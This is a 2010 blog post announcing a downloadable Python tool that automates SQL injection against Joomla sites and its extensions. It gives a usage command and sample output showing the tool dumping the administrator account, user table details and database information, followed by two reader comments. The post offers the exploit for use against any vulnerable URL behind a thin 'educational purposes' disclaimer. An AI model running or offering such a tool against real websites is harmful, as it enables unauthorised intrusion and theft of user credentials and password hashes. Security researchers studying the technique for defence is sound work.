Automated Joomla SQL Injection Exploiter

Today I am releasing my Automated Joomla SQL Injection Exploiter version 1.0 (23th May 2010).
[Download here]

I wrote this tool because I did not want to write a new exploit every time when a new Joomla (component/module/plugin) SQL injection vulnerability was discovered/revealed. Simply hand over a vulnerable Joomla URL to the tool and receive all Joomla users (with password hashes).

Description
The Automated Joomla SQL Injection Exploiter exploits almost every SQL injection vulnerability which was and will be discovered in Joomla or it’s components/modules/plugins. From now on you don’t need an exploit for every new SQL injection vulnerability! Just hand over the vulnerable URL to the tool and receive a list of Joomla users. The Automated Joomla SQL Injection Exploiter is based on my column fuzzer.

Features
– Check if URL is reachable
– Fuzz amount of columns (needed for UNION SELECT attack)
– Show a sample exploitation URL for pasting into the browser
– Showing the Joomla users from the table jos_users (with password hashes)
– Display current database, database user and database version

Additional information
Written in Python (less than 300 lines).

Screenshots

Automated Joomla SQL Injection Exploiter Screenshot 1

Automated Joomla SQL Injection Exploiter Screenshot 2

Usage
root@localhost: python joomla_sqli_sploiter.py -u “http://target/index.php?option=com_vulnerable?id=1”

Disclaimer
Tool was written for educational purposes only. I am not responsible for any damage you might cause using this tool. Know and respect your local laws! Only use this tool on websites you are allowed to test, e.g. for penetration testing.

Sample Output (bad formatted, sorry about that)
<root@localhost: python joomla_sqli_sploiter.py -u “http://target/index.php?com_option=blubb&id=1”
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Automated Joomla SQL Injection Exploiter 1.0 (23th May 2010)
by Valentin Hoebel (valentin@xenuser.org)
For educational purposes only! I am not responsible if you cause any damage!
Only use this tool on websites which you may test, e.g. for penetration testing.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,(^_^),~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>> Checking if connection can be established…
>> Connected to target! URL seems to be valid.
>> Assuming that your provided URL is vulnerable.
>> Trying to find the correct number of columns… (this may take a while)
>> Correct number of columns found!
>> Amount:  21
>> Do you want to have a sample exploitation URL for pasting into the browser? (Yes/No) no
>> Viewing a sample exploitation URL was skipped!
>> Now assuming that this is a Joomla installation.
>> Trying to fetch the first user of the Joomla user table…
ID:  [’62’]
Name:  [‘Administrator’] Username:  [‘admin’]
Password Hash:  [‘censored’]
E-Mail Address:  [‘valentin@xenuser.org’] User status:  [‘Super Administrator’]
>> Do you want to display all Joomla users? Replying with Yes will show you the source code response of the website. (Yes/No) no
>> Viewing the Joomla user table output was skipped!
>> Do you want to display the current database, database user and MySQL version? (Yes/No) yes
MySQL Database User:  [‘root@localhost’]
MySQL Database:  [‘joomla’]
MySQL Version:  [‘5.1.34-0.dotdeb.1-log’]
That’s it. Bye!

11 thoughts on “Automated Joomla SQL Injection Exploiter

  1. Haha, yes, a very important question indeed! Those were trackbacks which seem to be hidden (most of them aren’t valid anymore anyway).

  2. How can I avoid a syntax error on the “e” in “index.php” by typping in

    python joomla_sqli_sploiter.py – u “http://target/index.php?option=com_component?id=1” ?

    Using Python 2.7

Comments are closed.